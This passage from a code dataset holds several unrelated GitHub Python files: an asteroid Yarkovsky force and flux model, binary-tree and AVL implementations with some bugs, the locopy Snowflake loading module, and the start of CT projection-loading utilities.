the System.\n\n@author: nazli\n'''\n\nimport numpy as np\nfrom amuse.lab import Particle\nfrom amuse.lab import constants\nfrom amuse.units import units as u \n\nfrom cube_sphere import Sphere\n\nclass Asteroid(Particle):\n '''\n A subclass of the AMUSE Particle with added functionality for asteroids.\n\n Inputs:\n\n Variables:\n (from amuse.lab.Particle)\n - position : [x, y, z] spatial coordinates of the object.\n\n - tesselations: a list of patches [center, normal, area, temperature, albedo] defining the surface tesselation of the asteroid.\n '''\n def __init__(self, radius, definition = 10, key=None, particles_set=None, set_index=None, set_version=-1, **keyword_arguments):\n super().__init__(key, particles_set, set_index, set_version, **keyword_arguments) \n self.radius = radius\n\n tessellations = Sphere(self.radius.value_in(u.m), definition = definition).get_sphere_areas()\n for face in tessellations:\n face += [0, 0, 0] #To store temperature, albedo, emissivity.\n tessellations = np.array(tessellations, dtype=object)\n\n object.__setattr__(self, \"tessellations\", tessellations)\n \n self.get_albedo_emissivity()\n \n def get_albedo_emissivity(self, albedo_array = None, emissivity_array = None):\n '''\n Either automatically initialize the surface emissivity and albedo, or import them from array.\n\n Inputs:\n - albedo_array: an array of albedo values with same length as the number of tessellations. Manual input or auto-generated.\n - emissivity_array: an array of emissivity values with same length as the number of tessellations. 
Manual input or auto-generated.\n\n Returns:\n None\n '''\n if not albedo_array: \n self.tessellations[:,4] = np.random.uniform(0,1,len(self.tessellations[:,4]))\n else:\n self.tessellations[:,4] = albedo_array \n if not emissivity_array:\n self.tessellations[:,5] = np.array([0.65]*len(self.tessellations[:,5]))\n else:\n self.tessellations[:,5] = emissivity_array\n\n def get_acceleration(self, star_direction, star):\n '''\n Given the direction to and the star in the system, calculates the Yarkovsky (and YORP) forces on the asteroid through iterating over \n its own tesselated surface and returns the accelerations per spatial coordinate.\n\n Inputs:\n - star_direction: as defined in System.get_directions.\n - star: as defined in System variables.\n \n Returns:\n - acceleration: the total accelerations ax, ay, az on the asteroid.\n '''\n total_force = np.zeros(3) | u.m * u.kg * u.s**-2\n for patch in self.tessellations:\n #Define the variables. Ugly...\n center = patch[0]\n normal = patch[1]\n area = patch[2] | u.m**2\n temperature = None\n albedo = patch[4]\n emissivity = patch[5]\n \n #Calculate off-axis factor. If this number is less than 0, it means the patch is invisible from the star.\n mu_0 = np.dot(star_direction, normal)\n if mu_0 < 0:\n mu_0 = 0\n\n #Calculate incident flux.\n star_dist = np.linalg.norm(star.position-self.position) #norm is magnitude\n incident_flux = star.luminosity / (4*np.pi*star_dist**2)\n\n #Calculate and log the patch temperature.\n temperature = (((1-albedo)*mu_0*incident_flux)/(emissivity*constants.Stefan_hyphen_Boltzmann_constant))**(1/4)\n patch[3] = temperature\n \n #Calculate the scattering force.\n scattering_force = -(2/3) * (mu_0 * albedo * incident_flux / constants.c) * area * normal\n total_force += scattering_force\n\n #Calculate the thermal force.\n thermal_force = -(2/3) * (emissivity * constants.Stefan_hyphen_Boltzmann_constant \\\n * temperature**4 / constants.c) * area * normal\n total_force += thermal_force\n\n #Return accelerations. Account for the the zero point float.\n zero_float = 5.45e-14 | u.m * u.s**-2\n zero = 0 | u.m * u.s**-2\n\n ax = total_force[0]/self.mass if np.abs(total_force[0]/self.mass) > zero_float else zero \n ay = total_force[1]/self.mass if np.abs(total_force[1]/self.mass) > zero_float else zero \n az = total_force[2]/self.mass if np.abs(total_force[2]/self.mass) > zero_float else zero \n\n factor = 1e0 #Debugging tool.\n \n return factor*ax, factor*ay, factor*az\n\n def get_flux(self, obs_direction, star_direction, observer, star):\n '''\n Given the directions and the observer and star in the system, calculates the flux observed by the observer through iterating \n over its own tesselated surface.\n\n Inputs:\n - obs_direction: as defined in System.get_directions.\n - star_direction: as defined in System.get_directions.\n - observer: as defined in System variables.\n - star: as defined in System variables.\n\n Returns:\n - flux: the total flux observed by the observer.\n '''\n\n total_flux = 0 | u.kg * u.s**-3 \n for patch in self.tessellations:\n #Define the variables. Ugly...\n center = patch[0]\n normal = patch[1]\n area = patch[2] | u.m**2\n temperature = None\n albedo = patch[4]\n emissivity = patch[5]\n \n #Calculate off-axis factor. 
If this number is less than 0, it means the patch is invisible from the star.\n mu_0 = np.dot(star_direction, normal)\n if mu_0 < 0:\n mu_0 = 0 \n\n #Calculate the incident flux.\n star_dist = np.linalg.norm(star.position-self.position)\n incident_flux = star.luminosity / (4*np.pi*star_dist**2)\n\n #Calculate and log the patch temperature.\n temperature = (((1-albedo)*mu_0*incident_flux)/(emissivity*constants.Stefan_hyphen_Boltzmann_constant))**(1/4)\n patch[3] = temperature\n \n #Calculate the received flux due to re-emitted radiation. \n obs_dist = np.linalg.norm(observer.position-self.position)\n re_emitted_flux = constants.Stefan_hyphen_Boltzmann_constant * area * temperature**4 / (2*np.pi*obs_dist**2)\n re_emitted_flux = re_emitted_flux * np.dot(obs_direction, normal)\n total_flux += re_emitted_flux\n \n #Define the reflection reception criterion.\n def reflection_reception(v1, v2, observer):\n observer_size = 1 | u.REarth \n obs_dist = np.linalg.norm(observer.position-self.position)\n angle = np.arctan(observer_size/obs_dist)\n return bool(np.arccos(np.dot(v1, v2)) < angle)\n\n #Calculate the received flux due to reflected radiation.\n incident_obs_flux = (incident_flux*np.pi*self.radius**2) /(4*np.pi*obs_dist**2)\n \n reflected_flux = incident_obs_flux * albedo\n reflected_direction = star_direction - 2*np.dot(star_direction,normal)*normal \n if reflection_reception(obs_direction, reflected_direction, observer):\n total_flux += reflected_flux\n \n return total_flux","repo_name":"clairejol/AMUSE-Asteroids","sub_path":"scripts/asteroid.py","file_name":"asteroid.py","file_ext":"py","file_size_in_byte":7586,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"9325816944","text":"from typing import Any, Union\n\n\nclass Node:\n def __init__(self, value):\n self.value = value\n self.left = None\n self.right = None\n\n\ndef output(value):\n if not BinaryTree.testing:\n print(value)\n\n\nclass BinaryTree:\n testing = False\n\n def __init__(self, c_root_node, testing=False):\n self.__root = c_root_node\n self.testing = testing\n\n def preorder_traverse(self):\n def preorder(node: Node):\n if not node: return\n _list.append(node.value)\n output(node.value)\n preorder(node.left)\n preorder(node.right)\n\n _list = []\n preorder(self.__root)\n return _list\n\n def preorder_traverse_iter(self):\n _list = []\n node_stack = [self.__root]\n while len(node_stack):\n node = node_stack.pop()\n _list.append(node.value)\n output(node.value)\n if node.right:\n node_stack.append(node.right)\n if node.left:\n node_stack.append(node.left)\n return _list\n\n def inorder_traverse(self) -> list:\n def inorder(node: Node):\n if not node: return\n inorder(node.left)\n _list.append(node.value)\n if not self.testing: print(node.value)\n inorder(node.right)\n\n _list = []\n inorder(self.__root)\n return _list\n\n def inorder_traverse_iter(self):\n \"\"\"\n result_1 = [10, 41, 40, 42, 45, 50, 75]\n :return:\n \"\"\"\n current, stack, done, _list = self.__root, [], False, []\n while not done:\n if current is not None:\n stack.append(current)\n current = current.left\n else:\n if len(stack):\n current = stack.pop()\n _list.append(current.value)\n if not self.testing: print(current.value)\n current = current.right\n else:\n done = True\n return _list\n\n def postorder_traverse(self):\n def postorder(node: Node):\n if node.left:\n postorder(node.left)\n if node.right:\n postorder(node.right)\n print(node.value)\n\n postorder(self.__root)\n\n def 
postorder_traverse_iter(self):\n s1, s2 = [], []\n s1.append(self.__root)\n while len(s1):\n node = s1.pop()\n s2.append(node)\n if node.left:\n s1.append(node.left)\n if node.right:\n s1.append(node.right)\n while len(s2):\n node = s2.pop()\n print(node.value)\n\n def levelorder_traverse(self):\n root, queue = self.__root, []\n if not root: return\n queue.append(root)\n while len(queue):\n temp = queue.pop(0)\n print(temp.value)\n if temp.left:\n queue.append(temp.left)\n if temp.right:\n queue.append(temp.right)\n # end def\n\n\nclass BinarySearchTree:\n tree: Union[Node, Any]\n\n def __init__(self):\n super().__init__()\n self.__root = None\n\n def insert(self, value):\n this_node = Node(value)\n if not self.__root:\n self.__root = this_node\n else:\n current_root = self.__root\n while True:\n if current_root.value > value:\n if current_root.left is not None:\n current_root = current_root.left\n else:\n current_root.left = this_node\n break\n elif current_root.value < value:\n if current_root.right is not None:\n current_root = current_root.right\n else:\n current_root.right = this_node\n break\n else:\n break # both are the same\n\n # end insert\n\n def remove(self, value: int) -> Node:\n def find_min(root: Node) -> Node:\n while root.left:\n root = root.left\n return root\n\n def delete_recursive(root: Node, c_value: int) -> Union[Node, None]:\n if not root:\n return None\n elif c_value < root.value:\n root.left = delete_recursive(root.left, c_value)\n elif c_value > root.value:\n root.right = delete_recursive(root.right, c_value)\n else:\n if not root.left and not root.right:\n return None\n elif not root.left:\n root = root.right\n return root\n elif not root.right:\n root = root.left\n return root\n else:\n temp = find_min(root.right)\n root.value = temp.value\n root.right = delete_recursive(root.right, c_value)\n return root\n return root\n\n return delete_recursive(self.__root, value)\n\n # end remove\n\n def find_node(self, value: int) -> bool:\n current_root, found = self.__root, False\n while current_root:\n if value < current_root.value:\n current_root = current_root.left\n elif value > current_root.value:\n current_root = current_root.right\n else: # we found a match\n found = True\n break\n return found\n\n def get_structure(self):\n return self.__root\n\n\n# noinspection PyUnresolvedReferences\nclass AVL_Tree:\n #left: int\n\n def __init__(self, value):\n #super().__init__()\n self.left = None\n self.right = None\n self.value = value\n self.depth = 1\n\n def __set_depth_based_on_children(self):\n if self.depth is None: # self.value ?\n self.depth = 1\n\n if self.left is not None:\n self.depth = self.left.depth + 1\n\n if self.right is not None and self.depth <= self.right.depth:\n self.depth = self.right.depth + 1\n\n def __rotateLL(self):\n value_before = self.value\n right_before = self.right\n self.value = self.left.value\n\n self.right = self.left\n self.left = self.left.left\n self.right.left = self.right.right\n self.right.right = right_before\n self.right.value = value_before\n\n self.right.get_depth_from_children()\n self.__set_depth_based_on_children()\n\n def __rotateRR(self):\n value_before, left_before = self.value, self.left\n self.value = self.right.value\n\n self.left = self.right\n self.right = self.right.right\n self.left.right = self.left.left\n self.left.left = left_before\n self.left.value = value_before\n\n self.left.__set_depth_based_on_children()\n self.__set_depth_based_on_children()\n\n def __balance(self):\n l_depth = 0 if self.left is None else 
self.left.depth\n        r_depth = 0 if self.right is None else self.right.depth\n        if l_depth > r_depth + 1:\n            ll_depth = 0 if self.left.left is None else self.left.left.depth\n            lr_depth = 0 if self.left.right is None else self.left.right.depth\n\n            if ll_depth < lr_depth:\n                # left-right case: rotate the child first, then apply the usual left-left fix\n                self.left.__rotateRR()\n            self.__rotateLL()\n        elif l_depth + 1 < r_depth:\n            rr_depth = 0 if self.right.right is None else self.right.right.depth\n            rl_depth = 0 if self.right.left is None else self.right.left.depth\n            if rr_depth < rl_depth:\n                # right-left case: rotate the child first, then apply the usual right-right fix\n                self.right.__rotateLL()\n            self.__rotateRR()\n\n    def insert(self, value) -> bool:\n        child_inserted = False\n        if value == self.value:\n            return False\n        elif value < self.value:\n            if self.left is None:\n                self.left = AVL_Tree(value)\n                child_inserted = True\n            else:\n                # recursive call\n                child_inserted = self.left.insert(value)\n                if child_inserted:\n                    self.__balance()\n        elif value > self.value:\n            if self.right is None:\n                self.right = AVL_Tree(value)\n                child_inserted = True\n            else:\n                # recursive call\n                child_inserted = self.right.insert(value)\n                if child_inserted:\n                    self.__balance()\n        if child_inserted:\n            self.__set_depth_based_on_children()\n        return child_inserted\n\n    def remove(self, value):\n        def find_min(root):\n            while root.left: root = root.left\n            return root\n\n        def delete_recursive(root, c_value):\n            if not root:\n                return None\n            elif c_value < root.value:\n                root.left = delete_recursive(root.left, c_value)\n            elif c_value > root.value:\n                root.right = delete_recursive(root.right, c_value)\n            else: # found the node to delete\n                if not root.left and not root.right:\n                    return None # case 1: leaf\n                elif not root.left:\n                    root = root.right\n                    return root # case 2: only a right child\n                elif not root.right:\n                    root = root.left\n                    return root # case 2: only a left child\n                else:\n                    # case 3: two children, copy the in-order successor up and delete it\n                    temp = find_min(root.right)\n                    root.value = temp.value\n                    root.right = delete_recursive(root.right, temp.value)\n            root.__set_depth_based_on_children()\n            return root\n\n        return delete_recursive(self, value)\n\n\n# ~ Utility Functions ~ #\ndef construct_binary_tree() -> Node:\n    root = Node(42)\n\n    root.left = Node(41)\n    root.right = Node(50)\n\n    root.left.left = Node(10)\n    root.left.right = Node(40)\n\n    root.right.left = Node(45)\n    root.right.right = Node(75)\n\n    return root\n\n\ndef construct_binary_search_tree() -> BinarySearchTree:\n    _list = [42, 41, 10, 40, 50, 45, 75]\n    bst = BinarySearchTree()\n    for i in _list:\n        bst.insert(i)\n    return bst\n\n\ndef construct_avl_tree():\n    avl = AVL_Tree(1)\n    a_set = [2, 3, 4, 5, 123, 203, 2222]\n    for i in a_set:\n        avl.insert(i)\n    print(avl)\n    br = 1\n\n\nconstruct_avl_tree()\n\n\ndef run_binary_tree():\n    binary_search_tree = construct_binary_search_tree()\n    find20 = binary_search_tree.find_node(20)\n    find42 = binary_search_tree.find_node(42)\n\n    root_node = construct_binary_tree()\n    binary_tree = BinaryTree(root_node)\n\n    # print('preorder traverse: ')\n    t1 = binary_tree.preorder_traverse()\n\n    # print('\\npreorder traverse iterative: ')\n    t2 = binary_tree.preorder_traverse_iter()\n\n    br = 1\n\n# end of file\n","repo_name":"ideaguy3d/algos","sub_path":"@_Trees/tree2.py","file_name":"tree2.py","file_ext":"py","file_size_in_byte":10854,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"52"} +{"seq_id":"444749745","text":"import os\nfrom pathlib import PurePath\n\nfrom .database import Database\nfrom .errors import DBError, S3CredentialsError\nfrom .logger import INFO, get_logger\nfrom .s3 import S3\nfrom .utility import find_column_type\n\nlogger = get_logger(__name__, INFO)\n\nCOPY_FORMAT_OPTIONS = {\n    \"csv\": {\n        \"compression\",\n        
\"record_delimiter\",\n \"field_delimiter\",\n \"skip_header\",\n \"date_format\",\n \"time_format\",\n \"timestamp_format\",\n \"binary_format\",\n \"escape\",\n \"escape_unenclosed_field\",\n \"trim_space\",\n \"field_optionally_enclosed_by\",\n \"null_if\",\n \"error_on_column_count_mismatch\",\n \"validate_utf8\",\n \"empty_field_as_null\",\n \"skip_byte_order_mark\",\n \"encoding\",\n },\n \"json\": {\n \"compression\",\n \"file_extension\",\n \"enable_octal\",\n \"allow_duplicate\",\n \"strip_outer_array\",\n \"strip_null_values\",\n \"ignore_utf8_errors\",\n \"skip_byte_order_mark\",\n },\n \"parquet\": {\"binary_as_text\"},\n}\n\n\nUNLOAD_FORMAT_OPTIONS = {\n \"csv\": {\n \"compression\",\n \"record_delimiter\",\n \"field_delimiter\",\n \"file_extension\",\n \"date_format\",\n \"time_format\",\n \"timestamp_format\",\n \"binary_format\",\n \"escape\",\n \"escape_unenclosed_field\",\n \"field_optionally_enclosed_by\",\n \"null_if\",\n },\n \"json\": {\"compression\", \"file_extension\"},\n \"parquet\": {\"snappy_compression\"},\n}\n\n\ndef combine_options(options=None):\n \"\"\"Returns the ``copy_options`` or ``format_options`` attribute with spaces in between and as\n a string. If options is ``None`` then return an empty string.\n\n Parameters\n ----------\n options : list, optional\n list of strings which is to be converted into a single string with spaces\n inbetween. Defaults to ``None``\n\n Returns\n -------\n str:\n ``options`` attribute with spaces in between\n \"\"\"\n return \" \".join(options) if options is not None else \"\"\n\n\nclass Snowflake(S3, Database):\n \"\"\"Locopy class which manages connections to Snowflake. Inherits ``Database`` and implements\n the specific ``COPY INTO`` functionality.\n\n Parameters\n ----------\n profile : str, optional\n The name of the AWS profile to use which is typically stored in the\n ``credentials`` file. You can also set environment variable\n ``AWS_DEFAULT_PROFILE`` which would be used instead.\n\n kms_key : str, optional\n The KMS key to use for encryption\n If kms_key Defaults to ``None`` then the AES256 ServerSideEncryption\n will be used.\n\n dbapi : DBAPI 2 module, optional\n A database adapter which is Python DB API 2.0 compliant (``snowflake.connector``)\n\n config_yaml : str, optional\n String representing the YAML file location of the database connection keyword arguments. It\n is worth noting that this should only contain valid arguments for the database connector you\n plan on using. 
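For example, for ``snowflake.connector`` this could include keys such as ``user``, ``account``, and ``password`` (illustrative, not an exhaustive list).\n        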
It will throw an exception if something is passed through which isn't valid.\n\n **kwargs\n Database connection keyword arguments.\n\n Attributes\n ----------\n profile : str\n String representing the AWS profile for authentication\n\n kms_key : str\n String representing the s3 kms key\n\n session : boto3.Session\n Hold the AWS session credentials / info\n\n s3 : botocore.client.S3\n Hold the S3 client object which is used to upload/delete files to S3\n\n dbapi : DBAPI 2 module\n database adapter which is Python DBAPI 2.0 compliant (snowflake.connector)\n\n connection : dict\n Dictionary of database connection items\n\n conn : dbapi.connection\n DBAPI connection instance\n\n cursor : dbapi.cursor\n DBAPI cursor instance\n\n Raises\n ------\n CredentialsError\n Database credentials are not provided or valid\n\n S3Error\n Error initializing AWS Session (ex: invalid profile)\n\n S3CredentialsError\n Issue with AWS credentials\n\n S3InitializationError\n Issue initializing S3 session\n \"\"\"\n\n def __init__(\n self, profile=None, kms_key=None, dbapi=None, config_yaml=None, **kwargs\n ):\n try:\n S3.__init__(self, profile, kms_key)\n except S3CredentialsError:\n logger.warning(\n \"S3 credentials were not found. S3 functionality is disabled\"\n )\n logger.warning(\"Only internal stages are available\")\n Database.__init__(self, dbapi, config_yaml, **kwargs)\n\n def connect(self):\n \"\"\"Creates a connection to the Snowflake cluster by\n setting the values of the ``conn`` and ``cursor`` attributes.\n\n Raises\n ------\n DBError\n If there is a problem establishing a connection to Snowflake.\n \"\"\"\n super(Snowflake, self).connect()\n\n if self.connection.get(\"warehouse\") is not None:\n self.execute(\"USE WAREHOUSE {0}\".format(self.connection[\"warehouse\"]))\n if self.connection.get(\"database\") is not None:\n self.execute(\"USE DATABASE {0}\".format(self.connection[\"database\"]))\n if self.connection.get(\"schema\") is not None:\n self.execute(\"USE SCHEMA {0}\".format(self.connection[\"schema\"]))\n\n def upload_to_internal(\n self, local, stage, parallel=4, auto_compress=True, overwrite=True\n ):\n \"\"\"\n Upload file(s) to a internal stage via the ``PUT`` command.\n\n Parameters\n ----------\n local : str\n The local directory path to the file to upload. Wildcard characters (``*``, ``?``) are\n supported to enable uploading multiple files in a directory. 
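For example, ``/tmp/unload/*.csv`` would upload every CSV file in that folder (illustrative path).\n            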
Otherwise it must be the\n            absolute path.\n\n        stage : str\n            Internal stage location to load the file.\n\n        parallel : int, optional\n            Specifies the number of threads to use for uploading files.\n\n        auto_compress : bool, optional\n            Specifies if Snowflake uses gzip to compress files during upload.\n            If ``True``, the files are compressed (if they are not already compressed).\n            If ``False``, the files are uploaded as-is.\n\n        overwrite : bool, optional\n            Specifies whether Snowflake overwrites an existing file with the same name during upload.\n            If ``True``, an existing file with the same name is overwritten.\n            If ``False``, an existing file with the same name is not overwritten.\n        \"\"\"\n        local_uri = PurePath(local).as_posix()\n        self.execute(\n            \"PUT 'file://{0}' {1} PARALLEL={2} AUTO_COMPRESS={3} OVERWRITE={4}\".format(\n                local_uri, stage, parallel, auto_compress, overwrite\n            )\n        )\n\n    def download_from_internal(self, stage, local=None, parallel=10):\n        \"\"\"\n        Download file(s) from an internal stage via the ``GET`` command.\n\n        Parameters\n        ----------\n        stage : str\n            Internal stage location to load the file.\n\n        local : str, optional\n            The local directory path where files will be downloaded to. Defaults to the current\n            working directory (``os.getcwd()``). Otherwise it must be the absolute path.\n\n        parallel : int, optional\n            Specifies the number of threads to use for downloading files.\n        \"\"\"\n        if local is None:\n            local = os.getcwd()\n        local_uri = PurePath(local).as_posix()\n        self.execute(\n            \"GET {0} 'file://{1}' PARALLEL={2}\".format(stage, local_uri, parallel)\n        )\n\n    def copy(\n        self, table_name, stage, file_type=\"csv\", format_options=None, copy_options=None\n    ):\n        \"\"\"Executes the ``COPY INTO <table>`` command to load CSV files from a stage into\n        a Snowflake table. If ``file_type == csv`` and ``format_options == None``, ``format_options``\n        will default to: ``[\"FIELD_DELIMITER='|'\", \"SKIP_HEADER=0\"]``\n\n        Parameters\n        ----------\n        table_name : str\n            The Snowflake table name which is being loaded. Must be fully qualified:\n            `<namespace>.<table_name>`\n\n        stage : str\n            Stage location of the load file. This can be an internal or external stage\n\n        file_type : str\n            The file type. One of ``csv``, ``json``, or ``parquet``\n\n        format_options : list\n            List of strings of format options to provide to the ``COPY INTO`` command. The options\n            will typically be in the format of ``[\"a=b\", \"c=d\"]``\n\n        copy_options : list\n            List of strings of copy options to provide to the ``COPY INTO`` command.\n\n        Raises\n        ------\n        DBError\n            If there is a problem executing the COPY command, or a connection\n            has not been initialized.\n        \"\"\"\n        if not self._is_connected():\n            raise DBError(\"No Snowflake connection object is present.\")\n\n        if file_type not in COPY_FORMAT_OPTIONS:\n            raise ValueError(\n                \"Invalid file_type. Must be one of {0}\".format(\n                    list(COPY_FORMAT_OPTIONS.keys())\n                )\n            )\n\n        if format_options is None and file_type == \"csv\":\n            format_options = [\"FIELD_DELIMITER='|'\", \"SKIP_HEADER=0\"]\n\n        format_options_text = combine_options(format_options)\n        copy_options_text = combine_options(copy_options)\n        base_copy_string = (\n            \"COPY INTO {0} FROM '{1}' \" \"FILE_FORMAT = (TYPE='{2}' {3}) {4}\"\n        )\n        try:\n            sql = base_copy_string.format(\n                table_name, stage, file_type, format_options_text, copy_options_text\n            )\n            self.execute(sql, commit=True)\n\n        except Exception as e:\n            logger.error(\"Error running COPY on Snowflake. 
err: %s\", e)\n            raise DBError(\"Error running COPY on Snowflake.\")\n\n    def unload(\n        self,\n        stage,\n        table_name,\n        file_type=\"csv\",\n        format_options=None,\n        header=False,\n        copy_options=None,\n    ):\n        \"\"\"Executes the ``COPY INTO <location>`` command to export a query/table from\n        Snowflake to a stage. If ``file_type == csv`` and ``format_options == None``, ``format_options``\n        will default to: ``[\"FIELD_DELIMITER='|'\"]``\n\n        Parameters\n        ----------\n        stage : str\n            Stage location (internal or external) where the data files are unloaded\n\n        table_name : str\n            The Snowflake table name which is being unloaded. Must be fully qualified:\n            ``<namespace>.<table_name>``\n\n        file_type : str\n            The file type. One of ``csv``, ``json``, or ``parquet``\n\n        format_options : list\n            List of strings of format options to provide to the ``COPY INTO`` command.\n\n        header : bool, optional\n            Boolean flag if header is included in the file(s)\n\n        copy_options : list\n            List of strings of copy options to provide to the ``COPY INTO`` command.\n\n        Raises\n        ------\n        DBError\n            If there is a problem executing the UNLOAD command, or a connection\n            has not been initialized.\n        \"\"\"\n        if not self._is_connected():\n            raise DBError(\"No Snowflake connection object is present\")\n\n        if file_type not in UNLOAD_FORMAT_OPTIONS:\n            raise ValueError(\n                \"Invalid file_type. Must be one of {0}\".format(\n                    list(UNLOAD_FORMAT_OPTIONS.keys())\n                )\n            )\n\n        if format_options is None and file_type == \"csv\":\n            format_options = [\"FIELD_DELIMITER='|'\"]\n\n        format_options_text = combine_options(format_options)\n        copy_options_text = combine_options(copy_options)\n        base_unload_string = (\n            \"COPY INTO {0} FROM {1} \" \"FILE_FORMAT = (TYPE='{2}' {3}) HEADER={4} {5}\"\n        )\n\n        try:\n            sql = base_unload_string.format(\n                stage,\n                table_name,\n                file_type,\n                format_options_text,\n                header,\n                copy_options_text,\n            )\n            self.execute(sql, commit=True)\n        except Exception as e:\n            logger.error(\"Error running UNLOAD on Snowflake. err: %s\", e)\n            raise DBError(\"Error running UNLOAD on Snowflake.\")\n\n    def insert_dataframe_to_table(\n        self, dataframe, table_name, columns=None, create=False, metadata=None\n    ):\n        \"\"\"\n        Insert a Pandas dataframe to an existing table or a new table. In newer versions of the\n        python snowflake connector (v2.1.2+) users can call the ``write_pandas`` method from the cursor\n        directly; ``insert_dataframe_to_table`` is a custom implementation and does not use\n        ``write_pandas``. Instead of using ``COPY INTO`` the method builds a list of tuples to\n        insert directly into the table. There are also options to create the table if it doesn't\n        exist and use your own metadata. If your data is significantly large then using\n        ``COPY INTO
`` is more appropriate.\n\n Parameters\n ----------\n dataframe: Pandas Dataframe\n The pandas dataframe which needs to be inserted.\n\n table_name: str\n The name of the Snowflake table which is being inserted.\n\n columns: list, optional\n The list of columns which will be uploaded.\n\n create: bool, optional\n Boolean flag if a new table need to be created and insert to.\n\n metadata: dictionary, optional\n If metadata==None, it will be generated based on data\n \"\"\"\n\n import pandas as pd\n\n if columns:\n dataframe = dataframe[columns]\n\n all_columns = columns or list(dataframe.columns)\n column_sql = \"(\" + \",\".join(all_columns) + \")\"\n string_join = \"(\" + \",\".join([\"%s\"] * len(all_columns)) + \")\"\n\n # create a list of tuples for insert\n to_insert = []\n for row in dataframe.itertuples(index=False):\n none_row = tuple([None if pd.isnull(val) else str(val) for val in row])\n to_insert.append(none_row)\n\n if not create and metadata:\n logger.warning(\"Metadata will not be used because create is set to False.\")\n\n if create:\n if not metadata:\n logger.info(\"Metadata is missing. Generating metadata ...\")\n metadata = find_column_type(dataframe, \"snowflake\")\n logger.info(\"Metadata is complete. Creating new table ...\")\n\n create_join = (\n \"(\"\n + \",\".join(\n [\n list(metadata.keys())[i] + \" \" + list(metadata.values())[i]\n for i in range(len(metadata))\n ]\n )\n + \")\"\n )\n column_sql = \"(\" + \",\".join(list(metadata.keys())) + \")\"\n create_query = \"CREATE TABLE {table_name} {create_join}\".format(\n table_name=table_name, create_join=create_join\n )\n self.execute(create_query)\n logger.info(\"New table has been created\")\n\n insert_query = \"\"\"INSERT INTO {table_name} {columns} VALUES {values}\"\"\".format(\n table_name=table_name, columns=column_sql, values=string_join\n )\n\n logger.info(\"Inserting records...\")\n self.execute(insert_query, params=to_insert, many=True)\n logger.info(\"Table insertion has completed\")\n\n def to_dataframe(self, size=None):\n \"\"\"Return a dataframe of the last query results. This is just a convenience method. This\n method overrides the base classes implementation in favour for the snowflake connectors\n built-in ``fetch_pandas_all`` when ``size==None``. If ``size != None`` then we will continue\n to use the existing functionality where we iterate through the cursor and build the\n dataframe.\n\n Parameters\n ----------\n size : int, optional\n Chunk size to fetch. Defaults to None.\n\n Returns\n -------\n pandas.DataFrame\n Dataframe with lowercase column names. 
Returns None if no fetched\n result.\n \"\"\"\n if size is None and self.cursor._query_result_format == \"arrow\":\n return self.cursor.fetch_pandas_all()\n else:\n return super(Snowflake, self).to_dataframe(size)\n","repo_name":"capitalone/locopy","sub_path":"locopy/snowflake.py","file_name":"snowflake.py","file_ext":"py","file_size_in_byte":16522,"program_lang":"python","lang":"en","doc_type":"code","stars":99,"dataset":"github-code","pt":"52"} +{"seq_id":"36559422760","text":"import glob\nimport os\nimport random\nimport re\nimport time\nfrom contextlib import contextmanager\nfrom pathlib import PurePath ,Path\n\nimport imageio\nimport numpy as np\nimport torch\nfrom cv2 import COLOR_GRAY2RGB, VideoWriter, VideoWriter_fourcc, cvtColor\n\n\ndef load_projections(walnut_path, orbit_id, angular_sub_sampling=1):\n \"\"\"Loads all CB projections from one walnut/orbit pair with associated info for reconstruction\"\"\"\n\n def flip_trans(image):\n \"\"\"Re-orients projections correctly\"\"\"\n return np.transpose(np.flipud(image))\n\n\n print(f\"Loading: {walnut_path}...\")\n\n proj_files = sorted(glob.glob(os.path.join(walnut_path, 'Projections', f'tubeV{orbit_id}', 'scan_*.tif'))) \n flat_files = sorted(glob.glob(os.path.join(walnut_path, 'Projections', f'tubeV{orbit_id}', 'io*.tif')))\n dark_file = os.path.join(walnut_path, 'Projections', f'tubeV{orbit_id}', 'di000000.tif')\n vec_file = os.path.join(walnut_path, 'Projections', f'tubeV{orbit_id}', 'scan_geom_corrected.geom')\n\n projections = np.stack([flip_trans(imageio.imread(file)) for file in proj_files], axis=0)\n\n dark_field = flip_trans(imageio.imread(dark_file))\n flat_field = np.mean(np.stack([flip_trans(imageio.imread(file)) for file in flat_files], axis=0), axis=0)\n\n # first and last are projections under the same angle\n projs_idx = range(0, 1200, angular_sub_sampling)\n vecs = np.loadtxt(vec_file)\n\n # Projections acquired in reverse order of vecs\n projections = projections[projs_idx][::-1]\n vecs = vecs[projs_idx]\n\n return projections, dark_field, flat_field, vecs\n\n\ndef rescale_before_saving(func):\n \"\"\"Decorator for imageio.imsave & imageio.mimsave functions, rescales float \n images to uint8 range and changes type to uint8 to prevent warning messages\"\"\"\n\n def rescale(*args, **kwargs):\n \n def normalize(image):\n if image.max()-image.min() == 0:\n return np.zeros_like(image)\n\n return (image-image.min()) / (image.max()-image.min())\n\n\n im = kwargs.pop('im', kwargs.pop('ims', args[1]))\n uri = kwargs.pop('uri', args[0])\n \n if isinstance(uri, PurePath):\n if uri.suffix in ['.tif', '.tiff']:\n return func(uri, im, **kwargs)\n \n elif uri.split('.')[-1] in ['tif', 'tiff']:\n return func(uri, im, **kwargs)\n\n # Normalizing to [0,1] then rescaling to uint\n im = (normalize(im) *255).astype('uint8')\n\n return func(uri, im, **kwargs)\n\n # if im.min() >= 0:\n # if im.max() <= 1: \n # # Resclaing [0,1] floats to uint8\n # im = (im *255).astype('uint8')\n\n # elif im.max() <= 255:\n # # Matches type to avoid warnings\n # im = im.astype('uint8')\n \n # elif im.min() >= -1 and im.max() <= 1:\n # # Rescaling [-1,1] floats to uint8\n # im = ((im +1) *127.5).astype('uint8')\n \n # return func(uri, im, **kwargs)\n\n return rescale\n\n@rescale_before_saving\ndef imsave(*args, **kwargs):\n return imageio.imsave(*args, **kwargs)\n\n@rescale_before_saving\ndef mimsave(*args, **kwargs):\n return imageio.mimsave(*args, **kwargs)\n\n\ndef save_vid(filename, image_stack, codec='MJPG', fps=30, **kwargs):\n \"\"\"Saves image 
